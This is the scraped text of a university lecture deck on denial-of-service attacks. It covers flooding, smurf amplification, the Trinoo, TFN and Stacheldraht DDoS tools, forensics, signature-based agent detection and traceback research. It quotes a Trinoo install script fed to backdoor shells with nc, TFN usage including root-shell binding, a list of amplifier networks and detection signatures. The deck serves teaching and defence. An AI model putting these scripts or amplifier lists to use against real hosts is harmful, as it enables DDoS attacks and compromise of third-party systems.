Denial of Service CS155 Spring Quarter - PowerPoint PPT Presentation

About This Presentation

Title:

Denial of Service CS155 Spring Quarter

Description:

sunset:security telnet jimi-hendrix 1524. Trying 171.65.38.180... Connected to jimi-hendrix.Stanford.EDU (171.65.38.180). Escape character is ' ... – PowerPoint PPT presentation

Number of Views:143

Avg rating:3.0/5.0

Slides: 61

Provided by: davidb88

Learn more at: https://crypto.stanford.edu

Category:

more less

Transcript and Presenter's Notes

Title: Denial of Service CS155 Spring Quarter

1
Denial of ServiceCS155 Spring Quarter

David Brumleydbrumley_at_stanford.edu

2
Overview

Overview/History of DoS
Traditional DoS
DDoS
Tracking DoS
Preventative Measures
Conclusion

3
Who are we talking about?
Govt (NSA)
R D Labs/Universities
Computer Professionals
Exploit Writers
Script Kiddies
4
Example GRC.COM
5
Example GRC.COM

hi, its me, wicked, im the one nailing the server
with
udp and icmp packets, nice sisco router, btw im
13, its
a new addition, nothin tracert cant handle, and
ur on a
t3.....so up ur connection foo, we will just keep
comin
at you, u cant stop us "script kiddies" because
we are
better than you, plain and simple.
-------------------
Yo, u might not thing of this as anyomous, but
its not real info, its a stolen earthlink, so
its good, now, to speak of the implemented
attacks, yeah its me, and the reason me and my 2
other contributers do this is because in a
previous post you call us script kiddies, at
least so I was told.

6
Classic DoS

Fork/malloc() bomb
Flooding
June 1996 1st Adv. on UDP flooding
Theme Exploit finite queue or exposed
unoptimized interface
Fix 1 limit interface
Fix 2 optimize interface

7
Example SYN Flooding
1
2

Fix 1 Minimal state cache _at_ A
Fix 2 SYN Cookies

Syn
A
Ack
SYNACK
B
Overall Fixing is Non-Trivial Programming
8
Most Prevalent Attacks

Jolt/jolt2 IP Fragment Reassembly (UDP and TCP)
Stream/raped Flood with ACKs
Trash IGMP Flooding
Mix UDP/TCP/ICMP flooding
Starting to target routers instead of hosts

9
Distributed Attack Smurf
10s to 100s of hosts..
10
Amplification Networks

Netscan.org
210.95.3.128 427 (Korea)
203.252.30.0 401 (Korea)
203.252.30.255 390 (Korea)
210.95.3.255 300 (Korea)
130.87.223.255 174 (Japan)
206.101.110.127 (US)
Average amplification 4

11
Ping Attack

PING 206.101.110.127 56 data bytes
no reply from 206.101.110.127 within 1 sec
no reply from 206.101.110.127 within 1 sec
no reply from 206.101.110.127 within 1 sec
no reply from 206.101.110.127 within 1 sec
no reply from 206.101.110.127 within 1 sec
no reply from 206.101.110.127 within 1 sec
no reply from 206.101.110.127 within 1 sec
no reply from 206.101.110.127 within 1 sec
no reply from 206.101.110.127 within 1 sec
no reply from 206.101.110.127 within 1 sec
no reply from 206.101.110.127 within 1 sec
.

12
Ping Attack

64 bytes from 206.101.110.1 seq13 ttl21
time127 ms.
64 bytes from 206.101.110.1 seq13 ttl21
time171 ms, duplicate.
64 bytes from 206.101.110.1 seq13 ttl21
time175 ms, duplicate.
64 bytes from 206.101.110.1 seq13 ttl21
time181 ms, duplicate.
64 bytes from 206.101.110.1 seq13 ttl21
time185 ms, duplicate.
64 bytes from 206.101.110.1 seq13 ttl21
time216 ms, duplicate.
64 bytes from 206.101.110.1 seq13 ttl21
time220 ms, duplicate.
64 bytes from 206.101.110.1 seq13 ttl21
time222 ms, duplicate.
64 bytes from 206.101.110.1 seq13 ttl21
time229 ms, duplicate.
64 bytes from 206.101.110.1 seq13 ttl21
time230 ms, duplicate.
64 bytes from 206.101.110.1 seq13 ttl21
time241 ms, duplicate.
64 bytes from 206.101.110.1 seq13 ttl21
time243 ms, duplicate.
64 bytes from 206.101.110.1 seq13 ttl21
time248 ms, duplicate.
64 bytes from 206.101.110.1 seq13 ttl21
time254 ms, duplicate.
64 bytes from 206.101.110.1 seq13 ttl21
time259 ms, duplicate.
.

13
Ping Attack

64 bytes from 206.101.110.1 seq13 ttl21
time1513 ms, duplicate.
64 bytes from 206.101.110.1 seq13 ttl21
time1518 ms, duplicate.
64 bytes from 206.101.110.1 seq13 ttl21
time1518 ms, duplicate.
.
64 bytes from 206.101.110.1 seq13 ttl21
time1571 ms, duplicate.
64 bytes from 206.101.110.1 seq13 ttl21
time1571 ms, duplicate.
64 bytes from 206.101.110.1 seq13 ttl21
time1572 ms, duplicate.
64 bytes from 206.101.110.1 seq13 ttl21
time1572 ms, duplicate.
.

14
Ping Attack

packet seq13 bounced at radio-adventures-corp.Was
hington.cw.net (208.173.12.42) Time to live
exceeded
packet seq13 bounced at radio-adventures-corp.Was
hington.cw.net (208.173.12.42) Time to live
exceeded
packet seq13 bounced at 208.155.245.6 Time to
live exceeded
packet seq13 bounced at 208.155.245.6 Time to
live exceeded
packet seq13 bounced at 208.155.245.6 Time to
live exceeded
packet seq13 bounced at 208.155.245.6 Time to
live exceeded
packet seq13 bounced at bar6-loopback.Washington.
cw.net (206.24.226.11) Time to live exceeded
packet seq13 bounced at 208.155.245.6 Time to
live exceeded
packet seq13 bounced at 208.155.245.6 Time to
live exceeded
64 bytes from 206.101.110.1 seq13 ttl21
time6917 ms, duplicate.
packet seq13 bounced at bar6-loopback.Washington.
cw.net (206.24.226.11) Time to live exceeded

15
Bad guys point of view

What to do if smurf no longer works?
Admins could disable broadcast
Admins could filter from broadcast networks

16
Distributed DoS
Client
Handlers/Masters
Agents/Daemons
17
Building DDoS Networks

Launch exploit
Log in through back door
Install daemon
Install "rootkit" to hide daemon
Repeat

18
Result of Exploit

Normal System
sunsetsecurity telnet elaine
Trying 171.64.15.86...
Connected to elaine21.stanford.edu.
Escape character is ''.
UNIX(r) System V Release 4.0 (elaine21.Stanford.ED
U)
elaine21.Stanford.EDU login

Hacked System sunsetsecurity telnet
jimi-hendrix 1524 Trying 171.65.38.180... Connect
ed to jimi-hendrix.Stanford.EDU
(171.65.38.180). Escape character is ''. ls
-altr / total 1618 -r-xr-xr-x 1 root root
1541 Oct 14 1998 .cshrc drwx------ 2
root root 8192 Apr 14 1999
lostfound drwxr-xr-x 1 root root
9 Apr 14 1999 bin drwxrwxr-x 2 root sys
512 Apr 14 1999 mnt
19
Example Intruder Script

Trin.sh
echo "rcp 192.168.0.1leaf /usr/sbin/rpc.listen"
echo "echo rcp is done moving binary"
echo "chmod x /usr/sbin/rpc.listen"
echo "echo launching trinoo"
echo "/usr/sbin/rpc.listen"
echo "echo \ \ \ \ \ /usr/sbin/rpc.listen
cron"
echo "crontab cron"
echo "echo launched"
echo "exit"

Automated exploit
./trin.sh nc 128.aaa.167.217 1524
./trin.sh nc 128.aaa.167.218 1524
./trin.sh nc 128.aaa.167.219 1524
./trin.sh nc 128.aaa.187.38 1524
./trin.sh nc 128.bbb.2.80 1524
./trin.sh nc 128.bbb.2.81 1524
./trin.sh nc 128.bbb.2.238 1524
./trin.sh nc 128.ccc.12.22 1524
./trin.sh nc 128.ccc.12.50 1524

20
RCP

Jun 30 075512 6Ermt_sgi3 rshd8111
root_at_poot.Stanford.EDU as demos cmd'/u
sr/lib/sunw,rcp -f neet.tar'
Jun 30 075512 6Ermt_sgi3 rshd8112
root_at_crash-bandit.Stanford.EDU as demos
cmd'/usr/lib/sunw,rcp -f neet.tar'
Jun 30 075512 6Ermt_sgi3 rshd8113
root_at_galena.Stanford.EDU as demos cmd'
/usr/lib/sunw,rcp -f neet.tar'
Jun 30 075512 6Ermt_sgi3 rshd8117
root_at_gradegrinder.Stanford.EDU as demos
cmd'/usr/lib/sunw,rcp -f neet.tar'
Jun 30 075512 6Ermt_sgi3 rshd8124
root_at_galena.Stanford.EDU as demos cmd'
rcp -f neet.tar'
Jun 30 075512 6Ermt_sgi3 rshd8127
root_at_poot.Stanford.EDU as demos cmd'rc
p -f neet.tar'
.
Over 200 hosts compromised!

21
DDoS Networks

Trinoo June/July 1999
TFN August/September 1999
Stacheldraht Sept/October 1999
IRC Botnet More recent

22
Trinoo Overview

Communication
Attacker to Masters(s) 27665/tcp
Master to daemon(s) 27444/udp
Daemon to Master(s) 31335/udp
List of masters hard coded into clients
UDP Flooder

23
Trinoo Master

Daemon list blowfish encrypted
Crypt() password required for startup
./master
?? wrongpassword
. . .
./master
?? gOrave
trinoo v1.07d2f3c

24
Trinoo Master Commands

die
mtimer (set DoS timer)
dos IP
mdie (password required)
mping - send "PING" command, should get a "PONG"
mdos
info - print version information
msize - Set DoS packet size
killdead - Solicits "HELLO" from clients, else
removes entry
bcast - list hosts
mstop - attempt to stop DoS. Not implemented )

25
Analysis of Handler

strings - master
. . .
---v
v1.07d2f3c
trinoo s
l44adsl
sock
0nm1VNMX
100924
Sep 26 1999
trinoo s ss
bind
read
HELLO
ZsoTN.cq4X31
bored
NEW Bcast - s

PONG
PONG d Received from s
Warning Connection from s
beUBZbLtK7kkY
trinoo s..rpm8d/cb4Sx/
. . .
DoS usage dos
DoS Packeting s.
aaa s s
mdie
ErDVt6azHrePE
mdie Disabling Bcasts.
d1e s
mdie password?

26
Daemon Forensics

Starting the client sends "HELLO" to the master
Commands of form "arg1 password arg2"
aaa pass IP - DoS IP on random UDP ports
bbb pass N - Sets time limits
png pass - send a "PONG" to the master on port
31335/udp
d1e pass
...
Note that UNIX strings by default only displays 4
or more ASCII characters!

strings --bytes3 ns tail -15
socket
bind
recvfrom
l44
s s s
aIf3YWfOhw.V.
aaa
bbb
shi
png
PONG
d1e
rsz
xyz
HELLO

27
Trinoo LSOF

lsof egrep "3133527665"
master 1292 root 3u inet 2460
UDP 31335
master 1292 root 4u inet 2461
TCP 27665 (LISTEN)
lsof -p 1292
COMMAND PID USER FD TYPE DEVICE SIZE
NODE NAME
master 1292 root cwd DIR 3,1 1024
14356 /tmp/...
master 1292 root rtd DIR 3,1 1024
2 /
master 1292 root txt REG 3,1 30492
14357 /tmp/.../master
master 1292 root mem REG 3,1 342206
28976 /lib/ld-2.1.1.so
master 1292 root mem REG 3,1 63878
29116 /lib/libcrypt-2.1.1.so
master 1292 root mem REG 3,1 4016683
29115 /lib/libc-2.1.1.so
master 1292 root 0u CHR 4,1
2967 /dev/tty1
master 1292 root 1u CHR 4,1
2967 /dev/tty1
master 1292 root 2u CHR 4,1
2967 /dev/tty1
master 1292 root 3u inet 2534
UDP 31335
master 1292 root 4u inet 2535
TCP 27665 (LISTEN)

28
Trinoo Forensics

Master IP addresses visible
Enough strings to recognize daemon/master easily
Listening TCP/UDP ports can be seen with "lsof"
Attacker session not encrypted

29
Tribal Flood Network

Communication
Client to handler none
Handler agent ICMP Echo Reply
DOS Types
SYN
UDP
ICMP
With spoofing capabilities

30
TFN Handler

--------------------------------------------------
------------ tribe flood network
(c) 1999 by Mixter
usage ./tfn ip port
contains a list of numerical hosts that are
ready to flood
-1 for spoofmask type (specify 0-3), -2
for packet size,
is 0 for stop/status, 1 for udp, 2
for syn, 3 for icmp,
4 to bind a rootshell (specify port)
5 to smurf, first ip is target,
further ips are broadcasts
ip target ips, separated by _at_ if more
than one
port must be given for a syn flood, 0
RANDOM
--------------------------------------------------
------------------

31
TFN Commands

define ID_ACK 123 / for replies to
the client /
define ID_SHELL 456 / to bind a
rootshell, optional /
define ID_PSIZE 789 / to change size
of udp/icmp packets /
define ID_SWITCH 234 / to switch
spoofing mode /
define ID_STOPIT 567 / to stop
flooding /
define ID_SENDUDP 890 / to udp flood
/
define ID_SENDSYN 345 / to syn flood
/
define ID_SYNPORT 678 / to set port /
define ID_ICMP 901 / to icmp flood
/
define ID_SMURF 666 / haps! haps! /

32
Identifying an Agent

--------------------------------------------------
----------------------------
td 5931 root cwd DIR 3,5
1024 240721
/usr/lib/libx/...
td 5931 root rtd DIR 3,1
1024 2 /
td 5931 root txt REG 3,5
297508 240734
/usr/lib/libx/.../td
td 5931 root 3u sock 0,0
92814 can't
identify protocol
--------------------------------------------------
----------------------------

33
Network Example

./tfn iplist 4 12345
tribe flood network (c) 1999
by Mixter
tcpdump -lnx -s 1518 icmp
tcpdump listening on eth0
055132.706829 10.0.0.1 192.168.0.1 icmp
echo reply
.... .... .... .... ....
.... .... ....
.... .... 0000 64d1 01c8
0000 3132 3334
3500
055132.741556 192.168.0.1 10.0.0.1 icmp
echo reply
.... .... .... .... ....
.... .... ....
.... .... 0000 6cae 007b
0000 7368 656c
6c20 626f 756e 6420 746f
2070 6f72 7420
3132 3334 350a 00

34
Forensics

Easy to spot in lsof ()
ICMP easy to disguise (-)
ICMP ECHO_REPLY often allowed through firewall
(-)
Attackers session not encrypted

35
Stacheldraht

Communication
Client Handler 16660/tcp
Handler agent 65000/tcp, ICMP_ECHOREPLY
Doesnt use agent TCP for anything on versions
Ive seen
Client/handler traffic blowfish encrypted
UDP/TCP/ICMP flooding w/ spoofing

36
Stacheldraht Client and Handler

Client to handler blowfish encrypted w/ password
authentication
Handler password sicken encrypted with crypt()
More proactive at identifying live/dead hosts
Similar to distributed network
Handler limited to 1000 agents

37
Handler Strings

starting trinoo emulation...
removing useful commands.
- DONE -
available commands in this version are
--------------------------------------------------
.mtimer .mudp .micmp .msyn .msort
.mping
.madd .mlist .msadd .msrem .distro .help
.setusize .setisize .mdie .sprange .mstop
.killall
.showdead .showalive
usage .distro
remember the distro files need to be
executable!
that means chmod x linux.bin , chmod x sol.bin
))
sending distro request to all bcasts....
user s
rcp server

38
Stacheldraht Agent

Interesting addition Upgrade feature via rcp
Attempts spoofed packet to handler to test if
spoofing is possible
Handlers compiled in or can be in blowfish
encrypted file (def pass randomsucks)
On start sends to handler ID value 666 with data
skillz, handler responds 667 with data ficken

39
DoS BotNets

Scan for vulnerable hosts
Infect
Join IRC channel and wait for further commands
Generally used for warez distribution as well
Example Kaiten

40
Fighting DDoSIdentify Agents

Strings of master in daemon
Finding master is important!
Dump and log as much as possible

41
Identifying DDoS Agents

Counter-espionage/intrusion
Identify intruders signature
Look for that signature
RID

42
RID Examples

start AgentStacheldraht
send icmp type0 id668 data""
recv icmp type0 id669 data"sicken"
nmatch2
end AgentStacheldraht
start AgentStacheldraht4
send icmp type0 id6268 data""
recv icmp type0 id669 data"sicken"
nmatch2
end AgentStacheldraht4

43
More RID Examples

start AgentTFN
send icmp type0 id789
recv icmp type0 id123 nmatch2
end AgentTFN
start AgentTrinoo
send udp dport27444 data"png l44adsl"
recv udp data"PONG" nmatch1
end AgentTrinoo

44
RID _at_ Stanford

start telnetd
send tcp dport7000 data"\r\n"
recv tcp data"Ataman Telnetd" nmatch1
end telnetd
./rid -t 20 -b 255 -n 2 171.64.0.0/16
171.64.250.82 infected with telnetd
171.64.245.132 infected with telnetd
171.64.245.76 infected with telnetd
171.64.245.22 infected with telnetd
171.64.241.116 infected with telnetd
156 Total!

45
General DDoS Observations

Intruders mix encryption mechanisms
No architecture in security design
Easily recognizable via strings

46
Defending against DoS

Resisting DoS
Filtering
Traffic Shaping
Pure filtering
Ingress incoming
Egress outgoing
Locating attacker(s)
Logging
Automatic trace back
Packet tagging

47
Logging

Audit utilities
Tcpdump
Argus
Cisco Netflow
Problem huge data sets
Asta.com netflow monitor

48
Input Logging

Log on to nearest router
Enable input debugging on router
Find upstream
Recurse

v
a
49
Controlled Flooding

Cheswick Burch
Idea Follow the slowest routers
Problems obvious

Attacker
R3
R1
R2
Victim
50
Node Sampling - Savage et alMethod 1

Use fragment ID
Mark packets with prob. p of router address
Issues
p 0.5
Long time to infer path (-)
Multiple attackers at same dist (-)

Attacker
R4
R3
R1
R2
R5
R6
Victim
51
Method 2 Edge Sampling

Add 3 fields
2 IP addresses making edge
Distance vector
Issues
Space requirements (-)
p can be arbitrary ()
Complexity (-)

Attacker
R4
R3
R1
R2
R5
R6
Fmt Src,Dst
Victim
52
Savages Compression Method

decides to fill in edge ID with prob. P. Set d0
Step 2a next hop b notices d0, writes b xor a
d
Step 2b next hop notices d !0, d

A
R3
R2
R3 xor R2 xor R2 R3
R1
R2 xor R1 xor R1 R2
Get R1s addr
V
53
Issues with Savage

Spread edge identification across multiple
packets ()
Combinatorial complexity during edge
identification (-) (Fixed by Dean, Franklin,
Stubblefield alg.)
Reuse of IP fragment field (-)
Does not work on existing hardware (IRL) (-)

54
Research Areas